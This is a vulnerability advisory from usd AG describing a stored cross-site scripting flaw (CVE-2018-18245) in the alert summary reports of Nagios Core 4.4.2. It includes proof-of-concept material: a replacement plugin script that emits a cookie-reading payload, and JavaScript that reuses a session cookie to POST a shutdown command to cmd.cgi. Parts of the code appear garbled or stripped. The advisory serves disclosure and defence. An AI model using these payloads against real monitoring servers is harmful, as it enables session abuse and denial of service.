usd-2018-0026 | Nagios Core/4.4.2

Advisory ID: usd-2018-0026
CVE Number: CVE-2018-18245
Affected Product: Nagios Core
Affected Version: 4.4.2
Vulnerability Type: Cross-Site Scripting (XSS)
Security Risk: Medium
Vendor URL:
Vendor Status: Not fixed


A cross-site scripting (XSS) vulnerability has been discovered in Nagios Core. This vulnerability allows attackers to place malicious JavaScript code into the web frontend through manipulation of plugin output. In order to do this the attacker needs to be able to manipulate the output returned by nagios checks, e.g. by replacing a plugin on one of the monitored endpoints. Execution of the payload then requires that an authenticated user creates an alert summary report which contains the corresponding output.

Nagios Core is a platform for network and system monitoring. It provides a web application for administrators which displays the current status of the monitored entities. Nagios uses plugins executed by the central server and plugins executed on the monitored endpoints via the NRPE service. An attacker that controls one of those endpoints has the ability to either modify plugin output or to replace the plugins executed on those endpoints. Accordingly, attackers may be able to control what is displayed to authenticated users within the web application. Nagios takes care to properly encode plugin results in most places to prevent XSS attacks. However, in the case of alert summary reports the output is not encoded, enabling attacks against the web application and its users.

Proof of Concept 

Simple PoC:
An attacker that controls one of systems monitored with NRPE replaces the check_load plugin by the following simple bash script:

PROGNAME=`/usr/bin/basename $0`
PROGPATH=`echo $0 | /bin/sed -e ‘s,[\\/][^\\/][^\\/]*$,,’`
echo -n “alert(document.cookie)”
echo -n “Testoutput”
exit $exitCode

As soon as the results of the modified check show up in the nagios web interface the payload should be in place. Note: The check status (exitCode) may need to be changed (to either 1 or 2) to make sure that an alert for the current status will show up in the summary page. When a user now views an alert summary report at /nagios/cgi-bin/summary.cgi and creates a report that contains the manipulated check result the payload will be executed.

Denial of Service PoC: Nagios Process Shutdown A more interesting attack would be able to shut down the Nagios process on the central server. To achieve this, the following JavaScript code will be used:

function submitRequest()
var xhr = new XMLHttpRequest();“POST”, “http:\/\/\/nagios\/cgi-bin\/cmd.cgi”, true);
xhr.setRequestHeader(“Accept”, “text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8”);
xhr.setRequestHeader(“Accept-Language”, “en-US,en;q=0.5”);
xhr.setRequestHeader(“Content-Type”, “application\/x-www-form-urlencoded”);
xhr.withCredentials = true;
var cvalue = document.cookie.substring(10);
var body = “nagFormId=”+cvalue;
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));

The above script extracts the HTTP value of the NagFormId cookie and places it into the nagFormId form variable. It then automatically sends a POST request to /nagios/cgi-bin/cmd.cgi with the cmd_typ=14 which causes the Nagios process to shut down. This functionality is available to users under the „Process Info“ navigation item. Note: The POST URL needs to point to the hostname or IP address of the actual Nagios server.

To prevent issues with semicolons in the JavaScript payload the JavaScript code is encoded with base64, wrapped with an eval() call and placed into the malicious plugin. The full PoC plugin then looks like this:

PROGNAME=`/usr/bin/basename $0`
PROGPATH=`echo $0 | /bin/sed -e ‘s,[\\/][^\\/][^\\/]*$,,’`
echo -n “Testoutput”
exit $exitCode


Encode output received from nagios plugins.


  • 2018-09-11 first contact request via
  • 2018-09-12 provided advisory via our secure transfer platform
  • 2018-10-12 received CVE ID and notified vendor about it
  • 2018-12-07 Security advisory released


This security vulnerabilities was found by Maximilian Boehner of usd AG.